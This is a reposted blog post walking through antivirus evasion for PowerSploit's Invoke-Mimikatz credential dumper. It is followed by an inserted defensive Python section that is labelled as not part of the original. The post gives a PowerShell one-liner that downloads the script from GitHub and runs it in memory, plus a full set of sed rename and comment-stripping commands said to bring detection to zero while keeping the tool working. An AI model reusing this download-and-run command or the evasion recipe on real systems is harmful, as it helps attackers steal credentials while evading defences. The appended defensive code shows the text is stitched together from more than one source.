Nytro

How to Bypass Anti-Virus to Run Mimikatz


Carrie Roberts //


Would you like to run Mimikatz without Anti-Virus (AV) detecting it? Recently I attempted running the PowerShell script “Invoke-Mimikatz” from PowerSploit on my machine but it was flagged by Windows Defender as malicious when saving the file to disk. Even when I ran this file without writing it to disk using the following command it still got caught.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz"


Windows Defender Detects Unmodified Mimikatz Script

Uploading the Invoke-Mimikatz.ps1 file to VirusTotal showed that 19 of 54 AV vendors currently detect this file as malicious.


AV Detection Rate for Unmodified Mimikatz Script

As you may know, AV detection schemes can be weak, simply looking for specific words in the file. Often these words can be changed without changing the functionality. For example, changing “Invoke-Mimikatz” to “Invoke-Mimidogz” using the following Linux command brings the detection rate down to 8 of 54.

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1


AV Detection Rate for “Katz” to “Dogz”

And how about getting rid of those unnecessary comments in the script?

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1


AV Detection Ratio After Removing Comments from Script

We are down to four (4) AV vendors detecting the malicious file after renaming “Katz” to “Dogz” and removing comments. A little further experimentation shows that AV doesn’t like the word “DumpCreds”, so let’s change it to “DumpCred”.

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1


AV Detection After Renaming “DumpCreds”

We are down to only two AV vendors detecting this file as malicious now. We could probably quit here and get a lot of mileage out of this script because who has even heard of those AV vendors anyway? But as my daughter would say after reading the disclaimer on hand sanitizer, “Why don’t they just put a little bit more in and kill ‘em all!?”


So let’s do this. Just add three more match and replace rules and “Winner, winner, chicken dinner!” The complete set of match and replace commands is listed below.

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1


No AV Detection After Match and Replace Rules


We successfully modified the Mimikatz script to avoid AV detection without changing the functionality. Great evidence of why you should not rely solely on your AV for protection.
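As an added illustration of that point (example code, not part of the original post), the Python below runs two checks over a constructed stand-in script before and after the post’s renames and comment stripping: a naive verbatim-name signature of the kind the sed rules defeat, and a structural check that decodes long base64 literals and looks for a PE “MZ” header. SAMPLE_SCRIPT, Invoke-Loader and the 48-character literal are constructed; the premise that the loader embeds its binary as base64 text is an assumption labelled in the code, not something the post states.

```python
import base64
import re

# Constructed stand-in for a PowerShell loader script; NOT the real Invoke-Mimikatz.
# Assumption (not stated in the post): the loader carries its PE payload as a
# base64 string literal, so an "MZ" header survives any renaming of identifiers.
SAMPLE_SCRIPT = '''<#
.SYNOPSIS
Constructed loader sample
#>
function Invoke-Mimikatz {
    # DumpCreds switch omitted
    $PEBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAA"
    Invoke-Loader -Win32Functions $Win32Functions
}
'''

# The kind of verbatim-name signatures the post defeats with sed renames.
NAME_SIGNATURES = ["Invoke-Mimikatz", "DumpCreds", "ArgumentPtr", "CallDllMainSC1"]

def keyword_hits(script: str) -> list:
    """Naive AV-style check: fires only when a known name appears verbatim."""
    return [sig for sig in NAME_SIGNATURES if sig in script]

# Runs of base64 text long enough to be an embedded blob rather than an identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def embedded_pe_found(script: str) -> bool:
    """Structural check: decode long base64 literals and look for a PE 'MZ' header."""
    for run in B64_RUN.findall(script):
        try:
            blob = base64.b64decode(run[: len(run) - len(run) % 4])
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if blob.startswith(b"MZ"):
            return True
    return False

def apply_post_renames(script: str) -> str:
    """Replay the post's edits: strip block and line comments, then rename names."""
    script = re.sub(r"<#.*?#>", "", script, flags=re.S)
    script = re.sub(r"^[ \t]*#.*$", "", script, flags=re.M)
    for old, new in [("Invoke-Mimikatz", "Invoke-Mimidogz"), ("DumpCreds", "DumpCred")]:
        script = script.replace(old, new)
    return script

if __name__ == "__main__":
    renamed = apply_post_renames(SAMPLE_SCRIPT)
    print("keyword hits before/after:", keyword_hits(SAMPLE_SCRIPT), keyword_hits(renamed))
    print("embedded PE before/after:", embedded_pe_found(SAMPLE_SCRIPT), embedded_pe_found(renamed))
```

The name signatures drop to zero hits after the renames while the structural check still fires, which is the gap that script block logging and behavioural detection, rather than string matching alone, are meant to cover.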


Modified Mimikatz Script Still Functional

For additional information on bypassing Anti-Virus, check out the “Sacred Cash Cow Tipping” webcast series.
